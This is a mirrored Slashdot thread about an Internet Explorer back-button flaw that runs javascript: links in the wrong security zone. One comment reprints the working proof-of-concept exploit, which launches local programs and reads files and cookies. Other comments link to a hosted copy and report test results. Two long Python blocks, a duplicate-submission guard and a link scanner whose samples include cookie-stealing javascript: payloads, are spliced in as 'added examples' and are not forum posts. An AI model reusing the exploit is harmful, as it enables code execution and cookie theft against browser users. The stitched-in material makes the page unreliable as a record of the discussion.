Slashdot Mirror


Don't Hit That Back Button

Saint Aardvark writes: "From the Bugtraq mailing list comes this warning: 'Using the Back Button in IE is dangerous'. When hitting the back button, javascript links will be executed in the security zone of the last url viewed. Proof-of-concept included in the warning will execute minesweeper or read your Google cookies."

188 of 640 comments

  1. Go Mozilla! by Anonymous Coward · · Score: 3, Insightful

    With every passing week, MS gives us more and more reasons not to use their POS browser. Whereas Mozilla is quickly becoming the undisputed king; tabbed browsing, filtering popups, better security options, and .. oh yeah, it's open source.

    Take that, Microsoft. ;-)

    1. Re:Go Mozilla! by moonbender · · Score: 2, Interesting

      Tune your settings (prefs - history and cache) a bit to reduce resource usage. I've seen it work fine on computers with 32 MB RAM, way, way faster than either IE or NN, so it doesn't really need all those resources it takes, though of course they don't hurt.
      Opera isn't really faster anymore than IE when you're viewing only one page at a time. If you're viewing half a dozen or more, IE really sucks while Opera is godlike. Switching between windows is virtually instant.
      Oh and not to mention mouse gestures. I doubt I can ever use a browser without mouse gestures again.
      As for DHTML support, yep, it sucks, but well, DHTML sucks, too. It's rarely used appropriately; much like Flash, it's more of a proof of a web designer's incompetence and reliance on flashy effects rather than solid content.

      --
      Switch back to Slashdot's D1 system.
    2. Re:Go Mozilla! by Gibbys+Box+of+Trix · · Score: 2, Interesting

      It will have an effect on the stats gathered, but it wouldn't inflate the stats on IE6.0 because it can't identify itself as IE6.0, only IE5.0.

      Still, it'd be interesting to know what percentage of the MSIE5.0 and Netscape and Others were attributable to Opera.

    3. Re:Go Mozilla! by rapid+prototype · · Score: 2, Informative

      yeah... those genius open-source guru types who know how to close an HTML tag...

      -rp

    4. Re:Go Mozilla! by Com2Kid · · Score: 2

      Damn thing is;

      I have no fucking clue who halle barry is (recognize the name from something but no idea what)

      who brooke gordon is

      WTF presa canario is

      who anni friesinger is

      I recognize the term dudley moore, but, uh WTF who/is it?

      no idea who jeff gordon is,

      but at least Anime is #1 on Google images! :)

    5. Re:Go Mozilla! by Sj0 · · Score: 2

      er....K-Meleon?

      I'm afraid not. K-Meleon is significantly faster than most other browsers in every circumstance I've tested it on.

      --
      It's been a long time.
  2. On a (somewhat) related topic... by webword · · Score: 4, Interesting

    Attack of the Back Button -- "Getting stuck on a web page can be painful. The back button doesn't always work. While there are many ways to escape from web pages, many users don't know the tricks. A company can stop hurting users by doing more testing, using proper development methods, and being aware of the issue."

    1. Re:On a (somewhat) related topic... by WhaDaYaKnow · · Score: 5, Funny

      users who get stuck on pages simply close the browser window.

      Which is exactly what you want because this generates an onunload event. At which point you can open a new window, which should preferably load a pop-under window, which has a hidden Flash object that plays a very loud siren.

      Then when the user moves the mouse cursor outside of the window, you maximize the window and load a duplicate pop-under, which also plays the siren. Because although one siren is good, two sirens are better.

      Now that you start getting the attention of the user, you load a full screen pop-up window, without borders, and in this window you will load an image to make it look exactly like a browser.

      In the meantime the volume on the (hidden) Flash players should have increased to the absolute maximum, and you could even consider switching one over to a screaming cat. (Obviously the onunload handlers for the pop-under windows should open AT LEAST two pop-under of similar quality.)

      Back to the front page - now that you have full control over the browser look and feel, you can conveniently move any 'close' or 'back' buttons out of the way as soon as the mouse pointer gets too close.

      At this point in time, you have increased the chances of getting a credit card number out of the user significantly, so it's up to you to present the user with the ability to enter their information.

      The best way to achieve this is to just have the text box that you want filled out follow the mouse. Not all users are very smart, so keep what you want done obvious.

      Once the information is obtained, change the page to read something along the lines that the user should absolutely NOT attempt to do anything, but most of all, not close any windows, because his credit card may be charged twice.

      After a last check that all pop-unders with screaming Flash players are still going strong, you are now done.

    2. Re:On a (somewhat) related topic... by psocccer · · Score: 2, Informative

      I agree the back button thing can be irritating, but sometimes you can't really work around it, e.g. if the page is dynamic and the data can change and the back button can become a data-integrity nightmare. Sure it can help to use transaction ID's and make sure nothing happens twice, but it's annoying to me as a web developer. Sometimes I wish there never was a back button.

      For a concrete example of problems w/ the back button, check out acmemail. It's a cool webmail client, uses perl and pop3, but if a user clicks back, usually after reading a message and wanting to get back to the message list, it will cause strange problems and eventually auto-log them out. It took a long time to teach the outside sales staff at work that you just need to click the "inbox" button instead of back, and to this day every time there is a meeting they mention that webmail is broken, then I check it out, find out they're using back, and explain the solution. Then the next meeting comes and it's square one all over again...

    3. Re:On a (somewhat) related topic... by rjamestaylor · · Score: 2, Insightful

      learn the user interface of your development platform, adhere to its principles even at the risk of causing you, the developer, more work and you'll have much happier users.

      --
      -- @rjamestaylor on Ello
    4. Re:On a (somewhat) related topic... by jesser · · Score: 4, Insightful

      Hotmail does not have this problem. Netscape webmail does not have this problem. It's a bug in your code, and I bet you would have saved time by fixing it rather than trying to "teach" your users how to work around it.

      --
      The shareholder is always right.
    5. Re:On a (somewhat) related topic... by ewhac · · Score: 2

      You work for Salon, don'cha?

      :-),
      Schwab

    6. Re:On a (somewhat) related topic... by civilizedINTENSITY · · Score: 2

      Adding to the list: Yahoo! mail doesn't have this problem. FastMail doesn't have this problem.

    7. Re:On a (somewhat) related topic... by Skweetis · · Score: 3, Interesting

      Actually, it may not be a bug. His webmail program may use POST instead of GET to pass data between screens. This is more secure than using GET (remember the Hotmail bug where you could read anyone else's mail by figuring out the URL to it? That was a GET problem.) Most browsers don't handle POST all that well when navigating through cached pages. Although this is really a browser issue, you are correct in that he could probably adjust his webmail to compensate if he is clever.
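The two points raised above, using transaction IDs so that nothing happens twice (psocccer) and the trouble browsers have when the back button lands on a cached POST (Skweetis), are usually solved together with the Post/Redirect/Get pattern plus a one-time form token. The following is an added example, not code from any poster or from acmemail; it simulates the request handlers in plain Python (the `FormTokenStore`, `get_compose_form` and `post_send` names and the dict-shaped responses are assumptions made for the example), so it runs offline without a web framework.

```python
import secrets


class FormTokenStore:
    """One-time tokens embedded in forms. A token is valid for exactly one POST,
    so a form re-sent from the browser cache (back button, reload) is refused.
    Constructed as an in-memory set; a real app keeps this in the user's session."""

    def __init__(self):
        self._live = set()

    def issue(self):
        token = secrets.token_urlsafe(16)
        self._live.add(token)
        return token

    def consume(self, token):
        """Return True the first time a token is presented, False afterwards."""
        if token in self._live:
            self._live.remove(token)
            return True
        return False


def get_compose_form(store):
    """GET handler: render the form with a fresh hidden token.
    Returned as a dict standing in for an HTTP response (assumption for the example)."""
    token = store.issue()
    body = (
        '<form method="POST" action="/send">'
        f'<input type="hidden" name="token" value="{token}">'
        '<textarea name="body"></textarea><input type="submit"></form>'
    )
    return {"status": 200, "body": body, "token": token}


def post_send(store, outbox, form):
    """POST handler: accept the message once, then redirect (303) so the
    history entry the user can go 'back' to is a harmless GET, not the POST."""
    if not store.consume(form.get("token", "")):
        # Stale or replayed token: do not act on the data a second time.
        return {"status": 409, "body": "Duplicate or stale submission ignored"}
    outbox.append(form["body"])
    return {"status": 303, "location": "/inbox"}


def simulate_back_button_resubmit():
    """Walk through the scenario: compose, send, press Back, browser re-POSTs the cached form."""
    store = FormTokenStore()
    outbox = []
    page = get_compose_form(store)
    form = {"token": page["token"], "body": "hello"}  # constructed sample submission
    first = post_send(store, outbox, form)    # real send -> 303 redirect to /inbox
    second = post_send(store, outbox, form)   # replay of the same cached form -> 409
    return first["status"], second["status"], len(outbox)


if __name__ == "__main__":
    print(simulate_back_button_resubmit())  # (303, 409, 1): one message sent, replay refused
```

The redirect answers the cached-POST problem on the browser side (after the 303 the page in history is `/inbox`, a GET), and the token answers the data-integrity problem on the server side even when a browser does re-send the POST.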

  3. Java's been crashing IE of late by blair1q · · Score: 2, Insightful

    So it may not matter.

    http://arizona.diamondbacks.mlb.com crashes both IE6 and IE5.

    I don't know why. Could be the address it crashes at has a hardware problem on my machine. But why is java poking around my hardware?

    Java is insecure, Windows is insecure, the Internet is insecure, and everyone using them has always known that.

    --Blair

    1. Re:Java's been crashing IE of late by mattr · · Score: 2

      Not true with my copy (Win2K Japanese, IE5.50) if same url.

      Redirects to http://arizona.diamondbacks.mlb.com/NASApp/mlb/ari / omepage/ari_homepage.jsp

    2. Re:Java's been crashing IE of late by evil_one · · Score: 3, Insightful

      My roommate had IE crash on any site that used Javascript. Then I removed the spyware from his computer. Wow... what a difference.

      --
      Desperation is a stinky cologne
    3. Re:Java's been crashing IE of late by asv108 · · Score: 5, Informative

      Java is insecure

      I think you're referring to JavaScript, originally called LiveScript by Netscape before the Java buzz hit. JavaScript has nothing to do with Java. Java is relatively secure by most standards.

    4. Re:Java's been crashing IE of late by ivan256 · · Score: 2

      Holy fucking weird, dude. That's a strange bug. Just verified it on IE 5.00.3314.2108 with the 128bit security update.

    5. Re:Java's been crashing IE of late by diesel_jackass · · Score: 2

      I blame those damn popup ads.

    6. Re:Java's been crashing IE of late by NutscrapeSucks · · Score: 2

      Did you install Sun Java 1.4? It has the "feature" of taking over Java support from the MS JVM. On my box, this almost always results in a hung browser.

      You can disable this behavior in the Java control panel.

      --
      Whenever I hear the word 'Innovation', I reach for my pistol.
    7. Re:Java's been crashing IE of late by civilizedINTENSITY · · Score: 2

      Of course when I install the newest Java, I want it to be used. Windows' JVM is stuck back at where the courts caught them "screwing the pooch". Nobody really uses the MS JVM, do they? Radically limits what you'd be able to view, I'd think.

    8. Re:Java's been crashing IE of late by Peyna · · Score: 2

      The images all save, they are hosting at 'home.hp.com' or some such place.

      --
      What?
  4. This doesn't worry me. by Anonymous Coward · · Score: 4, Funny

    I don't have anything special in my Google cookies and I like to play minesweeper.

    1. Re:This doesn't worry me. by enderak · · Score: 2, Funny

      Yeah, until it learns to play for itself and beats all your high scores...

  5. How far can you exploit this? by Agelmar · · Score: 3, Interesting

    Would a vulnerability still exist if a user wrote a page that redirected the browser to some page with malicious code in the target, and then, with a little bit of javascript set the location to javascript:history.back() (i.e. on mouse movement or whatever). Would this cause the javascript to run under the improper security settings, or does the user actually have to hit the "back" button?

  6. Proof-of-Concept by acm · · Score: 2, Redundant

    <html>
    <h1>Press link and then the backbutton to trigger script.</h1>
    <a href="javascript:execFile('file:///c:/winnt/system32/winmine.exe')">
    Run Minesweeper (c:/winnt/system32/winmine.exe Win2000 pro)</a><br>
    <a href="javascript:execFile('file:///c:/windows/system32/winmine.exe')">
    Run Minesweeper (c:/windows/system32/winmine.exe XP, ME etc...)</a><br>
    <a href="javascript:readFile('file:///c:/test.txt')">
    Read c:\test.txt (needs to be created)</a><br>
    <a href="javascript:readCookie('http://www.google.com/')">
    Read Google cookie</a>

    <script>
    // badUrl = "http://www.nonexistingdomain.se"; // Use if not XP
    badUrl = "res:";
    function execFile(file){
    s = '<object classid=CLSID:11111111-1111-1111-1111-111111111111 ';
    s+= 'CODEBASE='+file+'></OBJECT>';
    backBug(badUrl,s);
    }
    function readFile(file){
    s = '<iframe name=i src='+file+' style=display:none onload=';
    s+= 'alert(i.document.body.innerText)></iframe>';
    backBug(badUrl,s);
    }
    function readCookie(url){
    s = '<script>alert(document.cookie);close();<'+'/script>';
    backBug(url,s);
    }
    function backBug(url,payload){
    len = history.length;
    page = document.location;
    s = "javascript:if (history.length!="+len+") {";
    s+= "open('javascript:document.write(\""+payload+"\")')";
    s+= ";history.back();} else '<script>location=\""+url
    s+= "\";document.title=\""+page+"\";<"+"/script>';";
    location = s;
    }
    </script>
    </html>

    1. Re:Proof-of-Concept by guran · · Score: 2

      Well...

      I tried this on one of our IIS machines, but the virus protection took care of it immediately (renaming the file to .htm.vir)

      --

      All opinions are my own - until criticized
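The summary and the proof-of-concept above hinge on `javascript:` (and `file:`) URLs placed in link and frame attributes. A filtering proxy or mail gateway that wants to flag such links has to normalise the value first, because browsers of the time accepted a leading space, mixed case, embedded tab or newline characters, and character references inside the scheme. The scanner below is an added example written for this page, not code from the advisory or from any poster; the `scheme_of`, `scan_html` and `RiskyLinkScanner` names, the attribute and scheme lists, and the sample HTML are assumptions made for the example. It uses only the Python standard library.

```python
import html
import re
from html.parser import HTMLParser

# Attributes whose value is a URL and can therefore carry a script scheme (assumed list).
URL_ATTRS = {"href", "src", "codebase", "data", "action", "formaction"}
# Schemes worth flagging when a page arrives from the network (assumed list).
RISKY_SCHEMES = ("javascript:", "vbscript:", "file:", "res:")


def scheme_of(value):
    """Return the normalised scheme ("javascript:", "http:", ...) of an attribute
    value, or "" if it has none. Decodes character references, drops whitespace and
    control characters, and lower-cases, so "java\\tscript:" and "&#106;avascript:"
    both come out as "javascript:"."""
    v = html.unescape(value)
    v = re.sub(r"[\x00-\x20]", "", v)  # leading/embedded blanks and control chars
    m = re.match(r"([a-z][a-z0-9+.\-]*):", v, re.I)
    return m.group(1).lower() + ":" if m else ""


class RiskyLinkScanner(HTMLParser):
    """Collects (tag, attribute, scheme, raw value) for every URL attribute whose
    normalised scheme is in RISKY_SCHEMES. HTMLParser already decodes character
    references in attribute values; scheme_of decodes again so it also works on raw strings."""

    def __init__(self):
        super().__init__()
        self.findings = []

    def handle_starttag(self, tag, attrs):
        for name, value in attrs:
            if value is None or name.lower() not in URL_ATTRS:
                continue
            scheme = scheme_of(value)
            if scheme in RISKY_SCHEMES:
                self.findings.append((tag, name.lower(), scheme, value))


def scan_html(text):
    """Parse one HTML document and return the list of risky URL attributes found."""
    parser = RiskyLinkScanner()
    parser.feed(text)
    parser.close()
    return parser.findings


# Constructed sample document: three disguised javascript: links, one file: frame,
# and two harmless references that must not be flagged.
SAMPLE_HTML = """<html><body>
<a href="javascript:execFile('file:///c:/example/app.exe')">plain</a>
<a href="  JaVaScRiPt:alert(document.cookie)">leading blanks, mixed case</a>
<a href="&#106;avascript:alert(1)">character reference in the scheme</a>
<a href="http://www.google.com/">ordinary link</a>
<iframe src="file:///c:/test.txt"></iframe>
<img src="/logo.gif">
</body></html>"""

if __name__ == "__main__":
    for tag, attr, scheme, raw in scan_html(SAMPLE_HTML):
        print(f"<{tag} {attr}> scheme={scheme} value={raw!r}")
```

Running it on the sample reports the three `javascript:` anchors and the `file:` iframe and nothing else. Stripping all blanks and control characters before matching is deliberate: the scheme is everything before the first colon, so removing them cannot turn a safe scheme into a flagged one, but it does defeat the padding tricks that a naive `startswith("javascript:")` check misses.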

  7. Re:Using Linux considered harmful by Anonymous Coward · · Score: 5, Funny

    Linux advocacy on IRC, in a nutshell:

    Q: Internet Explorer has a lot of security bugs. What do I do?

    A: Install Mozilla.

    Q: Windows has a lot of security bugs. What do I do?

    A: Install Linux.

    Q: Somebody cracked into my default installation of Red Hat 6.2. What do I do?

    A: Didn't you RTFM? Everybody knows that you have to keep patching the system to keep people out of it! Why don't you go to Windows, dumbass?

  8. Unfair to release the advisory before fix... by NoMoreNicksLeft · · Score: 5, Funny

    If they had waited til tomorrow, they'd have known about M$'s fix for this dangerous security hole. SP3 for IE6 patches it up fine though. That's right, when you mouseover the back button, a popup text alerts you that it might be dangerous (that M$ can't be held responsible for damages resulting from its use?). Also, the "Safe Back Button" is now next to it, but to get it out the door in time, they've had to rush. Yes folks, it uses the exact same codebase as the back button, and no, I don't see that as a problem. Besides, if it is, they'll fix it with SP4, and the "Really Safe Back Button". Right along side the other two, for backward compatibility.

  9. Test it out if you have IE by ekrout · · Score: 5, Informative

    I copied the source from the (now Slashdotted) page and created an HTML file at http://www.eg.bucknell.edu/~ekrout/IE_Hack.html for those of you with IE to test it out. If you want, reply to this post and let everyone know if it works with your browser, Windows version, etc.

    This is a very troubling security hole for Windows users who prefer IE (99.7% of them).

    Founder, monolinux

    --

    If you celebrate Xmas, befriend me (538
    1. Re:Test it out if you have IE by Tjp($)pjT · · Score: 2, Funny

      I guess IE on the Mac works better. No such problems there.

      --
      - Tjp

      I am in wallow with my inner money grubbing capitalistic pig. ... Oink!

    2. Re:Test it out if you have IE by Quietust · · Score: 2

      The Minesweeper one only worked after I created the directory and copied in the EXE.
      One of the advantages of having Windows 2000 installed on drive D (except for the fact that I have a rather outdated install of Win98SE on drive C; gotta get rid of that one of these days).
      What bothers me is that it still worked even after I changed the default security level for Local Intranet to High (maximum)...

      --
      * Q
      P.S. If you don't get this note, let me know and I'll write you another.
    3. Re:Test it out if you have IE by gartogg · · Score: 2

      To add to the report, it works on 98 se with 5.5 (after changing the link to go to minesweeper's old location.)

      ObJoke, quoted from bugtraq:
      "Workaround: Disable active scripting or [!!]never use the back button.[!!]"

      --
      I'm a conscientious .sig objector.
    4. Re:Test it out if you have IE by CmdrSanity · · Score: 2, Informative

      McAfee stopped it cold.

    5. Re:Test it out if you have IE by magicslax · · Score: 2, Funny

      Same with IE on Wine. When I pressed back it just gave me a segfault....much better. :-) truth.

      by the way, the 'please close all aplications and restart your computer' error window really cracks me up when the app was run under wine in the first place.

    6. Re:Test it out if you have IE by 56ker · · Score: 4, Funny

      Mind you - I'm sure there's some IE users who've never figured out what the buttons do yet! ;o)

    7. Re:Test it out if you have IE by NumberSyx · · Score: 2

      Worked on NT4/SP6 with IE 6.0

      --

      "Our products just aren't engineered for security,"
      -Brian Valentine,VP in charge of MS Windows Development

    8. Re:Test it out if you have IE by sconeu · · Score: 2

      Win2KSP2/SRP1 with IE5.5SP2.

      --
      General Relativity: Space-time tells matter where to go; Matter tells space-time what shape to be.
    9. Re:Test it out if you have IE by sconeu · · Score: 3, Informative

      I have the patch for MS02-015 (Q319182) installed, and Minesweeper fired up.

      --
      General Relativity: Space-time tells matter where to go; Matter tells space-time what shape to be.
    10. Re:Test it out if you have IE by the_quark · · Score: 2

      This does not work using IE 5.5 SP2, under Crossover Office Wine on Redhat 7.2. Really. :)

    11. Re:Test it out if you have IE by digitect · · Score: 2

      Win 95B (patched), IE 5.5 -- Worked using a modified path C:/Windows/winmine.exe

      (Yes, that's Windows 95. I prefer it.)

      --
      There is no need to use a SlashDot sig for SEO...
    12. Re:Test it out if you have IE by SaDan · · Score: 2

      Worked on W2K, IE 5.5SP2, completely patched.

    13. Re:Test it out if you have IE by Waffle+Iron · · Score: 3, Interesting

      by the way, the 'please close all aplications and restart your computer' error window really cracks me up when the app was run under wine in the first place.

      That's what I love about using Win4Lin:

      "Windows needs to restart in order to complete your request to change the default window frame color. Press OK to restart."

      I press OK, and Win98 "reboots" in 7 seconds flat.

    14. Re:Test it out if you have IE by jmorse · · Score: 2

      This works on 6.0.2600.0000 on Win2K. Seems like we get a new IE loophole every week.

      --

      "You done taken a wrong turn."
      -Bill McKinney, in Deliverance
    15. Re:Test it out if you have IE by Technician · · Score: 2

      Due to time on a modem and slow loading pages at home, I usually open new pages in a new window to let them load while reading the original page. I run with scripting off so pop-ups don't get out of hand. I didn't get to choose a browser at work. I seldom use the back button. I usually use ALT-F4.

      --
      The truth shall set you free!
    16. Re:Test it out if you have IE by Kris_J · · Score: 2

      I have IE 6.0.2600.whatever running on Win98SE. However, I also have F-prot anti-virus and the Proxomitron filtering proxy. F-prot spotted the exploit immediately and Proxomitron stopped the link from activating anyway. (I hate javascript pop-ups.) I never got to the bit where I would be pressing the back button.

    17. Re:Test it out if you have IE by LinuxGeek · · Score: 2

      You don't have win2k installed on drive c:.

      --

      Kindness is the language which the deaf can hear and the blind can see. - Mark Twain
    18. Re:Test it out if you have IE by LinuxGeek · · Score: 2

      Thanks dude! I remembered that I hadn't played minesweeper in months! Well, at least since I installed WinXP(erimental).

      --

      Kindness is the language which the deaf can hear and the blind can see. - Mark Twain
    19. Re:Test it out if you have IE by ekidder · · Score: 2

      I am running Win2k with IE6.0.2600.0000. Actually, I'm running Netcaptor, but it uses IE, so it's mostly the same. Everything is updated to the latest. That said...

      #1 and #3 worked. #2 didn't do anything. #4 brought me to the Google web page.

    20. Re:Test it out if you have IE by Grond · · Score: 2

      On my laptop which runs Windows 2000 and has IE 5.5 completely up to date (i.e., I just went to WindowsUpdate and installed the latest security updates), the exploit works on all the tests (well, except for the Minesweeper exploit targeted at Win98/ME, obviously).
      So, unless it's fixed in IE 6, and I see no evidence of this, then this is not something that Microsoft has addressed yet.

    21. Re:Test it out if you have IE by Jayde+Stargunner · · Score: 2

      WinXP, IE 6.0. Does not have any effect whatsoever. Just pauses on a blank screen.

      -Jayde

      --
      What's a sig?
    22. Re:Test it out if you have IE by hyrdra · · Score: 2

      Win2k SP3-b, IE version 5.00.2920.0000

      Does not work, giving access denied and page not found errors.

      --


      "I'll just chip in a bit for RedHat: I actually have that installed on my university machine." - Linus, '95
    23. Re:Test it out if you have IE by SomeGuyFromCA · · Score: 3, Informative

      it still worked even after I changed the default security level for Local Intranet to High

      That's because this doesn't work off local intranet, it works off local hard drive; files on your hard drive are automatically run without safeties, and MICROS~1 does not offer any option to change this.

      --
      if the answer isn't violence, neither is your silence / freedom of expression doesn't make it alright
    24. Re:Test it out if you have IE by Sentry21 · · Score: 2

      I actually have my own test URL up (http://www.cdslash.net/temp/back.htm) which makes a great companion to my XP logout exploit which works great in IE6 (that example logs out WinXP and Win2K with crappo security settings. If you don't have a logoff.exe, you're fine).

      Results so far, it works for me, but it does NOT work for a friend who is running Win98, as I am, but IE 5.x instead of 6.0 (which I have).

      --Dan

    25. Re:Test it out if you have IE by Diabolical · · Score: 2

      Works with MS 2000, IE 6.0.2600.0000 Latest "security" updates.

    26. Re:Test it out if you have IE by greenrd · · Score: 2, Informative

      Actually, there is a registry hack to enable security configuration for "My Computer". But it's so annoying I wouldn't recommend it. As you browse around your HD in explorer it keeps warning you about ActiveX controls (i.e. explorer's built-in file displaying stuff). It's stupid.

    27. Re:Test it out if you have IE by Alsee · · Score: 3, Informative

      TESTED AND VERIFIED UNDER GAMESPY ARCADE

      This vulnerability affects applications which integrate IE functionality!

      Gamespy "GameSpy Arcade is the #1 online gaming service... Support for over 300 of the leading games and demos".

      -

      --
      - - You can't take something off the Internet! That's like trying to take pee out of a swimming pool.
    28. Re:Test it out if you have IE by mcrbids · · Score: 2

      None of the links worked using IE 5.0 on Win98.

      -Ben

      --
      I have no problem with your religion until you decide it's reason to deprive others of the truth.
    29. Re:Test it out if you have IE by Perdo · · Score: 2

      It works great... I'll never have to go through the arduous process of working my way through my start menu ever again.. or yours for that matter..

      --

      If voting were effective, it would be illegal by now.

    30. Re:Test it out if you have IE by NMerriam · · Score: 2

      winXP Pro with IE6 (all patches up to date from windowsupdate) and the cookie works, the minesweeper seemed to take a few tries. Most of the time it just wound up with a blank IE page, but there may just be some sort of latency launching the app.

      --
      Recursive: Adj. See Recursive.
    31. Re:Test it out if you have IE by RWarrior(fobw) · · Score: 2

      AVP caught and blocked it. This is with the Apr 8 2002 database.

      --
      Remove the caps and hold to a mirror.
    32. Re:Test it out if you have IE by Chanc_Gorkon · · Score: 2

      This worked for me.....March 28th Cumulative patch

      --

      Gorkman

  10. My company's solution to IE by Ali+Jenab · · Score: 4, Interesting

    It's been almost five years since Microsoft released their first acknowledgement of a security vulnerability in Internet Exploder. I remember the day that happened clearly; if only I had the foresight at the time to see that the same exact scene would play out, on the average, once every two weeks for the next five years. I could have avoided disaster for my company.

    Back in 1999, when the dot-coms were flying high and my company resembled an Internet startup (although we had been in business since 1992), we hastily set up new offices and cubicles with little regard for information security. After all, what was the worst that could happen - an email worm? Well, we quickly found out: a malicious hacker had targeted our company, and sent an email to "all @" my domain containing a link to a supposed Yahoo News story. Unfortunately, this link sent the employees to a malicious site that caused their insecure IE browsers to yield control of nearly every Windows PC in the company to the intruder. They stole and destroyed much important data, and took over a week of nonstop unpaid overtime to fix things.

    A few weeks after the incident, our vice president of operations mandated a Mozilla-only policy. Employees were forbidden from running IE, Lynx (another notoriously insecure browser), and Konqueror (which crashed constantly anyway). Since that time, we have had zero browser related security issues, and employees waste far less time surfing the web, mainly because a lot of time-wasting sites only work in Microsoft standards-compliant browsers. Converting to Mozilla has been a win-win situation, and I fully expect the same to be happening across America after this latest IE security breach. Enough is enough; we need to take back control of our networks.

    /ali

    1. Re:My company's solution to IE by MADCOWbeserk · · Score: 2, Insightful

      Somehow I doubt this story. I have seen Netscape 4.X mandated, but Netscape itself had several security issues itself (brown oriface). Back in 1999 Mozilla sucked. It is only in the .9X branches that Mozilla/Netscape 6.X became usable. Whose environment offers a choice between Konq. Lynx Ie. and Mozilla, wondering where he sampled IE/Linux, Lynx and Konq/Win32. Finally, any self respecting company should have had their mail server configured to throw out those messages as junk.

      Frankly I love Mozilla, (especially with the Pinball theme). It has a great interface, and has become quite stable. However from a security standpoint it is still up in the air as to how secure it will be.

      Mozilla has a bright future. I would like to see it replace explorer as well IE. It would really screw Microsoft to lose the UI along with the browser.

    2. Re:My company's solution to IE by Baki · · Score: 2

      My company's solution (large bank in Switzerland) is to roll out IE, but disable active-X, javascript and cookies for the "Internet Zone". i.e. the standard browser is almost useless.

      Everyone keeps using NS4 (the former "official" browser) or installs some other browser themselves.

    3. Re:My company's solution to IE by civilizedINTENSITY · · Score: 3

      uh-oh...what about lynx? First I'd heard about lynx having security issues...could someone fill me in?

    4. Re:My company's solution to IE by NMerriam · · Score: 2, Funny

      ...mandated a Mozilla-only policy...employees waste far less time surfing the web

      No wonder -- it takes so long for a new window to open in Mozilla, they forget what site they wanted to visit!

      --
      Recursive: Adj. See Recursive.
    5. Re:My company's solution to IE by Lumpy · · Score: 2

      They stole and destroyed much important data, and took over a week of nonstop unpaid overtime to fix things.

      Wow... I hope you left the company right then and there.. Any scumbag boss that would even ask for employees to work late un-paid deserves to be A. bailed on in a tight situation, and B. reported to the labor board for illegal labor practices. Even salaried employees are afforded rights. No company owns you and a smart employee will instantly get in writing what compensation will be given for the extra work (2 days paid vacation for every 8 hours overtime worked is very fair, and the MINIMUM I accept).

      People, in any situation your boss tried to use you as slave labor... Run away as fast as you can.

      --
      Do not look at laser with remaining good eye.
    6. Re:My company's solution to IE by Cally · · Score: 2

      Personally, I'm amazed that anyone still uses IIS - yet Netcraft's survey shows that usage has been steadily increasing - ever since CodeRed and Nimda. Go figure! (When I first noticed this trend emerging in the Netcraft charts, I thought it must just be a blip caused by some major Apache-based hoster going bust... but by the third or fourth month in a row with a declining share, I realised that it's time to surrender all hope for humanity. We're doomed -- and we deserve it.)


      No doubt, last week's TEN new IIS security holes, announced by Microsoft all in one go (smart move...take the publicity hit all in one go, rather than dribble the news out AS THE HOLES ARE CONFIRMED (or even "as the patches become available")). Of course, such behaviour is diametrically opposed to the interests of those fools still running IIS; but then, it shouldn't be a surprise by now that PR is a bigger priority than security for Microsoft. "Trustworthy computing", my sweaty arse!

      If I ever become a manager, installing IIS or IE will be a sacking offence. I simply cannot understand why the much trumpeted "shareholder value" and "due diligence" and "director's personal liabilities" have not seen IIS dropped like a dead fish from any half-way competently run web site.

      My sympathy, by the way, to any unfortunates trapped in a job where you must admin an IIS. I suggest a stealth Apache install, perhaps as a hotfailover system - next time you have to kill IIS for "emergency maintenance", point out to the pointy haired cretins that you won't have any downtime, as you may always rely on Apache being there to pick up the slack.

      --
      "None are more hopelessly enslaved than those who falsely believe they are free." -- Goethe
    7. Re:My company's solution to IE by Lumpy · · Score: 2

      Many companies take advantage of the employees.. Great example is that you are asked to work overtime for free while your boss is nowhere to be found (sorry, if you ask your employees to sacrifice their free time so do you.) If an employee does it for free without asking, that's the employee's problem... if you are asked or threatened to work free.... you did it on your own, that IS different in every way, and you were rewarded.. if your boss said "thanks" and that was it or mentioned that "that's part of your job" I stand by the run like hell advice.

      --
      Do not look at laser with remaining good eye.
    8. Re:My company's solution to IE by Baki · · Score: 2

      Indeed, this bug might offer users a "legal" way to access sites with javascript :)

  11. This catch anyone's eye? by Omerna · · Score: 4, Insightful

    "Microsoft contacted 12 Nov 2001, additional information given 25 Mar 2002."

    That's a pretty long time (5-6 months, too lazy to figure out the actual number of days etc.) that Microsoft has done nothing (at least not a fix). Especially because this overlaps the time when they decided to make their people go to security workshops (or some such). If they can't even fix a known, reported bug in the security how can they find them on their own and fix them? Or not write them in the future?

    Oh yeah, it'd be nice to know if I can get around this by doing "right-click" / "back" or if that is affected and not JUST the toolbar.

    --
    No sig for you.
    1. Re:This catch anyone's eye? by ukryule · · Score: 3, Insightful

      "Microsoft contacted 12 Nov 2001, additional information given 25 Mar 2002."

      Well that links in well with the memo Bill Gates sent on January 15th. What was it he said?

      "We have done a great job of having teams work around the clock to deliver security fixes for any problems that arise. Our responsiveness has been unmatched ..."
      Hmm - that was before the new emphasis on security ...
      "If we discover a risk that a feature could compromise someone's privacy, that problem gets solved first."

      Given those comments, how can they not have done anything about this? Doesn't sound like a fundamental problem that would take a massive effort to fix.

    2. Re:This catch anyone's eye? by nitehorse · · Score: 2

      Do you happen to have a link?

      People are reporting that with fully-patched IEs they are still seeing this. I'd suggest you double-check.

    3. Re:This catch anyone's eye? by iabervon · · Score: 3, Funny

      MicroSoft said they were stopping all other work while they found and fixed security holes lurking undiscovered in their software. They're obviously not going to take time out of this important project to fix known security holes. Things like releasing patches and applying them to their websites will have to wait until the entire codebase has been carefully examined.

    4. Re:This catch anyone's eye? by Tony-A · · Score: 2

      Snicker. Oh, you want a working patch.
      Ever wonder why Microsoft doesn't want exploit code published?

      Should it be wehavethewayout^H^H^Hback.com ;)

  12. Re:So... by Cramer · · Score: 2

    That assumes you have a support contract so they'll pay you any attention at all. Good luck simply getting the "feedback" page so you can submit a bug (which no one will ever look at.)

  13. Back buttons by 56ker · · Score: 3, Funny

    " 'Using the Back Button in IE is dangerous'." - since when was using anything in IE safe? ;o)

    1. Re:Back buttons by British · · Score: 2

      I think the worst one I ran into was I was simply watching an AVI, and as soon as I closed the Media Player window, it took me to the AVI file vendor's website.

    2. Re:Back buttons by arkanes · · Score: 2

      Windows supports the encoding of URLs into AVI files in metadata somewhere (WMP files as well, of course). It's a media player "feature".

  14. A complete list by rosewood · · Score: 2

    Other than just clicking on the MS link, is there a site devoted just to the fuckups of MS? From calling the GPL cancer to dumb ass bugs like this, I would love a good site so that every time I see a post on shacknews that says "People just hate MS because everyone hates them, Windows 98 was fine and worked great for me"

    1. Re:A complete list by mrogers · · Score: 5, Funny
      Other than just clicking on the MS link, is there a site devoted just to the fuckups of MS?

      Yes there is, and you're looking at it right now.

